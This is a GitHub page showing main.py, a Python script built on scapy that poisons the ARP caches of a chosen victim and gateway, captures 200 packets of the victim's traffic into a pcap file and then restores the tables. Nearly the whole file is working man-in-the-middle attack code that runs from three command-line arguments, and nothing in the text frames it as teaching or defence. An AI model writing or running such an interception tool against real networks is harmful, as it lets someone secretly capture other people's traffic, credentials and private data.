-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.py
101 lines (86 loc) · 3.01 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
import os
import sys
import time
from multiprocessing import Process
from scapy.all import (ARP, Ether, conf, get_if_hwaddr, send, sniff, sndrcv, srp, wrpcap)
def get_mac(ip):
packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op='who-has', pdst=ip)
resp, _ = srp(packet, timeout=2, retry=10, verbose=False)
for _, r in resp:
return r[Ether].src
return None
class ARPoisoner:
def __init__(self, victim, gateway, interface='wlan0'):
self.victim = victim
self.gateway = gateway
self.interface = interface
self.vitctimmac = get_mac(victim)
self.gatewaymac = get_mac(gateway)
conf.iface = interface
conf.verb = 0
print(f'[*] Initialized {interface}')
print(f'[*] Gateway ({gateway}) is at {self.gatewaymac}')
print(f'[*] Victim ({victim}) is at {self.vitctimmac}')
print('-' * 30)
def run(self):
self.poison_thread = Process(target=self.poison)
self.poison_thread.start()
self.sniff_thread = Process(target=self.sniff)
self.sniff_thread.start()
def poison(self):
poison_victim = ARP()
poison_victim.op = 2
poison_victim.psrc = self.gateway
poison_victim.pdst = self.victim
poison_victim.hwdst = self.vitctimmac
print(poison_victim.summary())
print('-' * 30)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gatewaymac
print(poison_gateway.summary())
print('-' * 30)
print('[*] Beggining ARP poisoning', end='')
while True:
sys.stdout.write('.')
sys.stdout.flush()
try:
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit(1)
else:
time.sleep(2)
def sniff(self, count=200):
time.sleep(5)
print(f'\n[*] Sniffing {count} packets', end='')
filter = f'ip host {victim}'
packets = sniff(count=count, filter=filter, iface=self.interface)
wrpcap('ophidia.pcap', packets)
print('\n[*] Packets succefully sniffed')
self.restore()
self.poison_thread.terminate()
print('[*] Done.')
def restore(self):
print('[*] Restoring ARP tables...')
send(ARP(
op=2,
psrc=self.gateway,
hwsrc=self.gatewaymac,
pdst=self.victim,
hwdst='ff:ff:ff:ff:ff:ff'),
count=5)
send(ARP(
op=2,
psrc=self.victim,
hwsrc=self.vitctimmac,
pdst=self.gateway,
hwdst='ff:ff:ff:ff:ff:ff'),
count=5)
if __name__ == '__main__':
(victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3])
arpoisoner = ARPoisoner(victim, gateway, interface)
arpoisoner.run()